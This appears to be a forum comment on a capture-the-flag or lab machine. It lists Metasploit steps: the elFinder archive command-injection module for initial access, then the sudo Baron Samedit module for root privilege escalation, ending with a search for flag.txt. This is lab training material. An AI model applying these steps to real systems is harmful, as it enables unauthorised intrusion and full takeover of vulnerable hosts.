Perfect. That worked for me. First I ran local_exploit_suggester, which gave me a couple of options, but none of them worked. I tried googling those exploits to find them on GitHub, but the exploits provided didn’t work out. Thanks!
To find the flag.txt, you need two meterpreter steps
1. search elfinder → linux/http/elfinder_archive_cmd_injection
2. exploit
3. type “background” to put this exploit into the background
4. you will be back to meterpreter
5. use linux/local/sudo_baron_samedit
6. Set the LHOST
7. Obtain the session ID from (3) using the “session” command
8. set SESSION = session id from (7)
9. exploit and you will get the root prompt
10. find -f flag.txt